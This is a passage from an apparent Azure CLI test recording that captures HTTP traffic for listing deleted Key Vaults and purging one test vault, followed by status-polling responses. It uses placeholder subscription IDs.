rgeDate":"2020-04-25T17:11:23Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southcentralus/deletedVaults/clitestf6lq7ziokqh3dkpsg","name":"clitestf6lq7ziokqh3dkpsg","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rg2mhmykqhsgxq7knbacrxrfbiir4dfmsyz5mbjtwfuecpjg4loqxmtl3rwvot2mr2r/providers/Microsoft.KeyVault/vaults/clitestf6lq7ziokqh3dkpsg","location":"southcentralus","tags":{},"deletionDate":"2020-03-20T18:25:05Z","scheduledPurgeDate":"2020-06-18T18:25:05Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southcentralus/deletedVaults/clitest3zvxu4rsr6tqumcsy","name":"clitest3zvxu4rsr6tqumcsy","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgtj3rssqbhzbatcnt3twclix7b52rdvnfwmrcwsiusvh3ixk2dlttbwnbjkh4hkl2o/providers/Microsoft.KeyVault/vaults/clitest3zvxu4rsr6tqumcsy","location":"southcentralus","tags":{},"deletionDate":"2020-03-19T08:12:57Z","scheduledPurgeDate":"2020-06-17T08:12:57Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southcentralus/deletedVaults/clitest42h57eiz6tts7wv2o","name":"clitest42h57eiz6tts7wv2o","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgody7efo5s76evefykui2msh64z65vkb2xzjli46qlkyp5pze6kjmemsloeb5zq5zx/providers/Microsoft.KeyVault/vaults/clitest42h57eiz6tts7wv2o","location":"southcentralus","tags":{},"deletionDate":"2020-03-13T18:33:21Z","scheduledPurgeDate":"2020-06-11T18:33:21Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southcentralus/deletedVaults/clitesttwwerfe7vawtehhji","name":"clitesttwwerfe7vawtehhji","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgfrygla3nlekzul3b5sn4aqa2l2yk47nhnrprl6a6d2x26kgpoy2leixtkopl25pwq/providers/Microsoft.KeyVault/vaults/clitesttwwerfe7vawtehhji","location":"southcentralus","tags":{},"deletionDate":"2020-03-06T18:52:59Z","scheduledPurgeDate":"2020-06-04T18:52:59Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southcentralus/deletedVaults/ygcmkkv","name":"ygcmkkv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/ygcmk/providers/Microsoft.KeyVault/vaults/ygcmkkv","location":"southcentralus","tags":{},"deletionDate":"2020-03-06T14:11:15Z","scheduledPurgeDate":"2020-06-04T14:11:15Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-000003","name":"cli-test-kv-mgmt-000003","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000003","location":"westus","tags":{},"deletionDate":"2020-03-23T10:24:30Z","scheduledPurgeDate":"2020-03-30T10:24:30Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-xe3nrma","name":"cli-test-kv-mgmt-xe3nrma","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt3brblwljugzseunt26lvrdx2zoqhsdhlhm4rhzlrksiznpg63kglv/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-xe3nrma","location":"westus","tags":{},"deletionDate":"2020-03-23T07:45:41Z","scheduledPurgeDate":"2020-06-21T07:45:41Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-slpaykn","name":"cli-test-kv-mgmt-slpaykn","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtnpnuy6uncav5scer37yb4xpwe524zlmzqmwtktdf7j76hyj472qk5/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-slpaykn","location":"westus","tags":{},"deletionDate":"2020-03-22T05:33:55Z","scheduledPurgeDate":"2020-06-20T05:33:55Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-se-sd-4bafqr","name":"cli-test-kv-se-sd-4bafqr","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_secret_soft_deletexseygm6zy2bkojevjjurz7uck6i6ahbvuye6bkk/providers/Microsoft.KeyVault/vaults/cli-test-kv-se-sd-4bafqr","location":"westus","tags":{},"deletionDate":"2020-03-22T05:30:41Z","scheduledPurgeDate":"2020-06-20T05:30:41Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-se-sd-iyqyku","name":"cli-test-kv-se-sd-iyqyku","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_secret_soft_deletelwy6ql3akqidtxeqcvuokb2nuf2xlchtkpcasbw/providers/Microsoft.KeyVault/vaults/cli-test-kv-se-sd-iyqyku","location":"westus","tags":{},"deletionDate":"2020-03-21T14:43:21Z","scheduledPurgeDate":"2020-06-19T14:43:21Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault-nblk54xr2ky27b","name":"vault-nblk54xr2ky27b","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_nyintdokzcbvouvsn74gvltn7kwegt75iwzqc3d354vx2x/providers/Microsoft.KeyVault/vaults/vault-nblk54xr2ky27b","location":"westcentralus","tags":{},"deletionDate":"2020-03-23T09:07:31Z","scheduledPurgeDate":"2020-06-21T09:07:31Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault-onccbbmfasmsmn","name":"vault-onccbbmfasmsmn","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_sjlxi6j4kfqx7vinw25fdke6iamh4lctajcikusdnzyrkw/providers/Microsoft.KeyVault/vaults/vault-onccbbmfasmsmn","location":"westcentralus","tags":{},"deletionDate":"2020-03-20T18:41:55Z","scheduledPurgeDate":"2020-06-18T18:41:55Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault4-rci35nsn37ak3","name":"vault4-rci35nsn37ak3","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_snapshot_j2eeh3jbr33nl6kvutnl4zxlngw5srnbi52zi/providers/Microsoft.KeyVault/vaults/vault4-rci35nsn37ak3","location":"westcentralus","tags":{},"deletionDate":"2020-03-20T18:35:55Z","scheduledPurgeDate":"2020-06-18T18:35:55Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault3-qu6vguhdwlaui","name":"vault3-qu6vguhdwlaui","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_disk_update_ues3ormjmqfphd3p62tfg6rr3ian4upxso/providers/Microsoft.KeyVault/vaults/vault3-qu6vguhdwlaui","location":"westcentralus","tags":{},"deletionDate":"2020-03-20T18:35:11Z","scheduledPurgeDate":"2020-06-18T18:35:11Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault1567","name":"vault1567","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/fytest1567/providers/Microsoft.KeyVault/vaults/vault1567","location":"westcentralus","tags":{},"deletionDate":"2020-03-19T14:52:14Z","scheduledPurgeDate":"2020-06-17T14:52:14Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus2/deletedVaults/byokacraccr-kv","name":"byokacraccr-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/byokacraccr/providers/Microsoft.KeyVault/vaults/byokacraccr-kv","location":"westus2","tags":{},"deletionDate":"2020-01-12T17:14:08Z","scheduledPurgeDate":"2020-04-11T17:14:08Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus2/deletedVaults/yugangwwu2-kv","name":"yugangwwu2-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/yugangwwu2/providers/Microsoft.KeyVault/vaults/yugangwwu2-kv","location":"westus2","tags":{},"deletionDate":"2020-01-06T17:13:54Z","scheduledPurgeDate":"2020-04-05T17:13:54Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2euap/deletedVaults/zuhvault1","name":"zuhvault1","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/zuh/providers/Microsoft.KeyVault/vaults/zuhvault1","location":"eastus2euap","tags":{},"deletionDate":"2020-03-12T15:12:04Z","scheduledPurgeDate":"2020-06-10T15:12:04Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2euap/deletedVaults/zuhvault2","name":"zuhvault2","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/zuh/providers/Microsoft.KeyVault/vaults/zuhvault2","location":"eastus2euap","tags":{},"deletionDate":"2020-03-12T15:12:04Z","scheduledPurgeDate":"2020-06-10T15:12:04Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2euap/deletedVaults/zuhvault","name":"zuhvault","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/zuh/providers/Microsoft.KeyVault/vaults/zuhvault","location":"eastus2euap","tags":{},"deletionDate":"2020-03-12T15:12:04Z","scheduledPurgeDate":"2020-06-10T15:12:04Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2euap/deletedVaults/ygtestkv","name":"ygtestkv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/test/providers/Microsoft.KeyVault/vaults/ygtestkv","location":"eastus2euap","tags":{},"deletionDate":"2020-03-02T04:46:15Z","scheduledPurgeDate":"2020-05-31T04:46:15Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2euap/deletedVaults/zuhvalut","name":"zuhvalut","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/zuh/providers/Microsoft.KeyVault/vaults/zuhvalut","location":"eastus2euap","tags":{},"deletionDate":"2020-01-21T06:58:01Z","scheduledPurgeDate":"2020-04-20T06:58:01Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/centraluseuap/deletedVaults/ygmanualcmkkv","name":"ygmanualcmkkv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/ygmanualcmk/providers/Microsoft.KeyVault/vaults/ygmanualcmkkv","location":"centraluseuap","tags":{},"deletionDate":"2020-02-25T17:11:25Z","scheduledPurgeDate":"2020-05-25T17:11:25Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/centraluseuap/deletedVaults/cmkacrkv","name":"cmkacrkv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cmk/providers/Microsoft.KeyVault/vaults/cmkacrkv","location":"centraluseuap","tags":{},"deletionDate":"2020-02-25T17:11:25Z","scheduledPurgeDate":"2020-05-25T17:11:25Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/centraluseuap/deletedVaults/ygcmk","name":"ygcmk","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cmk/providers/Microsoft.KeyVault/vaults/ygcmk","location":"centraluseuap","tags":{},"deletionDate":"2020-02-23T17:11:27Z","scheduledPurgeDate":"2020-05-23T17:11:27Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/centraluseuap/deletedVaults/vault15871","name":"vault15871","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/yurg/providers/Microsoft.KeyVault/vaults/vault15871","location":"centraluseuap","tags":{},"deletionDate":"2020-01-13T17:11:21Z","scheduledPurgeDate":"2020-04-12T17:11:21Z","purgeProtectionEnabled":true}}],"nextLink":"https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=3ZftjuI2FIbvBVX9VQYnQBdGWlUBO2zoHGdtbFbhHxPCh83AaGCW4NXee9%2b027kHkIiUSFaQH78fJz9ah6o%2bP%2b0O%2ftR6%2fNGSuTZfxkIanTzZWeuxtT2fX0%2bPnc7L8rDcVC%2fV4fywDO9v1UN5fOmc3p9P5dvu9bw7Hk4d9hyt%2f%2bx9itrR85q1e6vVsr2sym67fB7Gn%2bI1G%2faHrPP6dvy%2bW1Vvpw7tyrfj6bg%2bP%2fxdXefL9%2f25s6r21bla%2fftw%2bmv5umt%2fx0q8%2fHPMomGb4Rf9%2ftvJ4x%2bPvjp8tn7%2bTc%2bnRludGjG3MzvMn%2bzernkWkdlcJReMnL%2fkPKnJUU18PyC%2bTYlnPcmyvjQZ1sxFzvcT5XwvN6NRbhYjCkmtXdn6oyWSmbl5DnXOyx72H6TLupKXfXLbgQxakBdXEjbWxseS24sy%2b5G0tlY%2bY7lVYANWLgGHb2JmhNX5V3HjmmhYdHPjo0Yb0m2gCT3I7SKVQsXSTJvz55KrmMJWgEskTXnVPutrayNtsl%2baSGZZcgckoATCyWOXIYE6tgNicixdOiIjYumLAFX0lNn0ZVBYs%2bDEbJ1DIXAXSMxya740FrkDHFfCFsnYi%2bSEwPA9yUcDCtOxNAgGDoMIPW5MQiwLMA1TZjWRZi9glJpC8REW8e3rAmftsj4FnLPzXQp6oOEK7SzSdDtRRnIpilgFzwCsCxCp5kUtXdKVjADibgqEXIYtC2zNXyF5yH40gB5i6VapMjYmtxpJjiANG9wnsTLimgvBtJmmuVD%2fW%2bReeDTh2W9YwCMoy80VYTlQbnORbppqU8YkNKQhurkV8FKBEtEpmcWEbIZCteDRFMntFyrisI9MwEUYIpIe8XSgbRakQHx6FK2QqeTFRYtUIEZjMtNJztUFrK6KiV8c7kYWMhRdMhn6U6BRElgF0WmKCzVzhBCQBzBwG0EWQYXVWDIkCEOUuqymDxx2duvRiQ7xMYYLgLCNNhihQ7SnWLn5CL2BobNAr0yRF9uRYkVXOwK4Ta3FfKx544%2f%2fBs5Y2OTrjffIlVyJ6co3oRFwj%2fligekbQWDRJcZfpFGYRlcpVNGoposYjZWnSFoVpG9gfBjkLnAEjFqGgKOpUWiBTwfkYQSHK2CGEBZD6RQfJ54pixzhSSA%2fnWihoI%2bi9fPnPw%3d%3d"}' headers: cache-control: - no-cache content-length: - '26903' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:24:39 GMT expires: - '-1' pragma: - no-cache strict-transport-security: - max-age=31536000; includeSubDomains vary: - Accept-Encoding x-content-type-options: - nosniff x-ms-original-request-ids: - 609c7433-e5fd-48d3-bd89-bef5bb87f379 - 7699abfe-ab37-474b-92fd-00a293ec5254 - 7bdb8bde-8336-4393-b098-accf89071e5b - 88854a41-2685-47d6-93fa-c13f26e2e0e4 - 76a052c7-870d-4189-894f-6eb8ca92f317 - 593a0fba-72e4-4c75-a2d7-aa34d51b3152 - 46ddd700-3ee1-4af2-b98a-ebacce6e844f - 26a8c997-892d-484b-bc31-6b559a6970ce - f73c2aac-4ebe-423e-98e7-b437608732d1 - 627342a0-56ea-4353-b9d0-7b692c4cda44 - 9e09ea03-fd69-4473-87fe-b2545b55ab6a - a43032a5-5823-422e-b7cc-bd8b942e1a63 - fa969d3d-4e80-4d37-84e0-082e49396aac - e61db018-b11d-462b-9b09-2699befa8646 - ecdec2df-4f16-43d1-b4ff-9ea4a978bc7c - 8e79e196-c2c8-4557-aba9-158af058885e - d56ac28c-c27a-45a5-a075-027f358e26c0 - 95895855-9786-4b7b-8e12-7f7ece2f46c5 - 670fee05-f73f-46a8-ad8f-e40683325b11 - 3aaec54e-6ee6-4709-b40c-0fc15c3137fa - f96533ee-0838-4dc8-88ac-62bcce6f7302 - 6f32ce08-0e51-489e-812a-b2d38d6289a9 - 1b01f391-2a13-4414-abf0-d4154b7b3e0f - 8a21f850-ca26-430d-8908-7c6dfe76c29d - 2d4a2b5d-c190-4935-9775-e964cd828e49 - a7e3fe5a-7ded-4674-be40-61df97227ce5 - 5f5dc3cb-4aaa-444b-a486-a6260b0390f1 - 32dd88dd-7928-4c22-8d5c-074827cbe776 - aafe8cfa-6705-4a14-96d0-70297150c748 - 9014ab44-ebd9-4f21-80b6-aa645cd270f5 - 52bf9a51-8028-4791-837d-4b31888e6b68 - 8e6ea0b4-c6ee-4139-9271-2c08080bbce6 - 8a8c6d07-26d7-4850-b29a-a561869b66af - 7a87b4a8-ad8b-477c-bdbe-d82c37778a4e - 274ca248-6489-4299-bc48-d3a455fcd317 status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault purge Connection: - keep-alive Content-Length: - '0' ParameterSetName: - -n User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: POST uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-000003/purge?api-version=2019-09-01 response: body: string: '' headers: cache-control: - no-cache content-length: - '0' date: - Mon, 23 Mar 2020 10:24:42 GMT expires: - '-1' location: - https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1ODgzNjY4Mjk2MHw4MENFOTBEOTY1NEU0RkEyQkE3Njk3MjY0NzZENTQwMA?api-version=2019-09-01 pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-ms-ratelimit-remaining-subscription-writes: - '1199' x-powered-by: - ASP.NET status: code: 202 message: Accepted - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault purge Connection: - keep-alive ParameterSetName: - -n User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1ODgzNjY4Mjk2MHw4MENFOTBEOTY1NEU0RkEyQkE3Njk3MjY0NzZENTQwMA?api-version=2019-09-01 response: body: string: '{"createdDateTime":"2020-03-23 10:24:42Z","status":"NotStarted"}' headers: cache-control: - no-cache content-length: - '64' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:24:49 GMT expires: - '-1' location: - https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1ODgzNjY4Mjk2MHw4MENFOTBEOTY1NEU0RkEyQkE3Njk3MjY0NzZENTQwMA?api-version=2019-09-01 pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 202 message: Accepted - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault purge Connection: - keep-alive ParameterSetName: - -n User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1ODgzNjY4Mjk2MHw4MENFOTBEOTY1NEU0RkEyQkE3Njk3MjY0NzZENTQwMA?api-version=2019-09-01 response: body: string: '{"createdDateTime":"2020-03-23 10:24:42Z","status":"NotStarted"}' headers: cache-control: - no-cache content-length: - '64' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:24:55 GMT expires: - '-1' location: - https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1ODgzNjY4Mjk2MHw4MENFOTBEOTY1NEU0RkEyQkE3Njk3MjY0NzZENTQwMA?api-version=2019-09-01 pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 202 message: Accepted - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault purge Connection: - keep-alive ParameterSetName: - -n User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1ODgzNjY4Mjk2MHw4MENFOTBEOTY1NEU0RkEyQkE3Njk3MjY0NzZENTQwMA?api-version=2019-09-01 response: body: string: '{"createdDateTime":"2020-03-23 10:24:42Z","status":"NotStarted"}' headers: cache-control: - no-cache content-length: - '64' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:25:00 GMT expires: - '-1' location: - https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1ODgzNjY4Mjk2MHw4MENFOTBEOTY1NEU0RkEyQkE3Njk3MjY0NzZENTQwMA?api-version=2019-09-01 pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 202 message: Accepted - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault purge Connection: - keep-alive ParameterSetName: - -n User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1ODgzNjY4Mjk2MHw4MENFOTBEOTY1NEU0RkEyQkE3Njk3MjY0NzZENTQwMA?api-version=2019-09-01 response: body: string: '{"createdDateTime":"2020-03-23 10:24:42Z","status":"NotStarted"}' headers: cache-control: - no-cache content-length: - '64' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:25:06 GMT expires: - '-1' location: - https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1ODgzNjY4Mjk2MHw4MENFOTBEOTY1NEU0RkEyQkE3Njk3MjY0NzZENTQwMA?api-version=2019-09-01 pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 202 message: Accepted - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault purge Connection: - keep-alive ParameterSetName: - -n User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1ODgzNjY4Mjk2MHw4MENFOTBEOTY1NEU0RkEyQkE3Njk3MjY0NzZENTQwMA?api-version=2019-09-01 response: body: string: '{"createdDateTime":"2020-03-23 10:24:42Z","status":"NotStarted"}' headers: cache-control: - no-cache content-length: - '64' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:25:11 GMT expires: - '-1' location: - https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1ODgzNjY4Mjk2MHw4MENFOTBEOTY1NEU0RkEyQkE3Njk3MjY0NzZENTQwMA?api-version=2019-09-01 pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 202 message: Accepted - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault purge Connection: - keep-alive ParameterSetName: - -n User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1ODgzNjY4Mjk2MHw4MENFOTBEOTY1NEU0RkEyQkE3Njk3MjY0NzZENTQwMA?api-version=2019-09-01 response: body: string: '{"createdDateTime":"2020-03-23 10:24:42Z","status":"NotStarted"}' headers: cache-control: - no-cache content-length: - '64' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:25:16 GMT expires: - '-1' location: - https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1ODgzNjY4Mjk2MHw4MENFOTBEOTY1NEU0RkEyQkE3Njk3MjY0NzZENTQwMA?api-version=2019-09-01 pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 202 message: Accepted - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault purge Connection: - keep-alive ParameterSetName: - -n User-Agent: - python/3.7.6 